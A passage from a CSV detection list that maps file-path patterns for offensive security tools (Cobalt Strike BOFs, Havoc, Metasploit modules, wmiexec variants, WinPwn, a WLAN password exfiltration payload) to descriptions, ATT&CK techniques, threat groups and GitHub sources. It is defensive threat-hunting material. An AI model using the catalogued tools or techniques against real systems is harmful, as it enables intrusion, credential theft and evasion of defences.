tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Widgets/LootWidget.*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/wifi_hopping.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/WiFiBroot*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" +"*/wifidump.c*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*/wifite -c *","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*/wifite2*","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","1","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*/wikipedia_fr.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" +"*/wikiZ/RedGuard*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*/win/Tor/tor.exe*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" +"*/Win7ElevateDll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/WinBruteLogon*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*/win-brute-logon*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*/windapsearch.git*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","1","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" +"*/windapsearch_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/windows/dcerpc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/windows_autologin.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/windows-login-phish*","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","N/A","N/A","1","17","5","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z" +"*/windows-lpe-template*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/Windows-Passwords.ps1*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*/windows-resources/hyperion*","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*/WindowsVault.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/WindowsVault.h*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/win-enum-resources*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/WinPwn*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*/WinPwn.git*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*/WinPwn_Repo*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*/WinPwnage*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/winregistry.py**","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/winrm.cpp*","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","27","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" +"*/winrm.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/winrmdll*","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","27","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" +"*/winrm-reflective-dll/*","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","27","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" +"*/winscp_dump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/Winsocky.git*","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","80","13","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" +"*/wireless.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/wiresocks.git*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" +"*/wmeye/*","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","4","334","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" +"*/WMI Lateral Movement/*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" +"*/wmi.dropper*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/WMI/wmi.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/wmiexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/wmiexec/*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","146","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" +"*/wmiexec2.git*","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*/wmiexec-Pro*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"*/wmisploit*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" +"*/word_list.c","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/word_list.h","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password 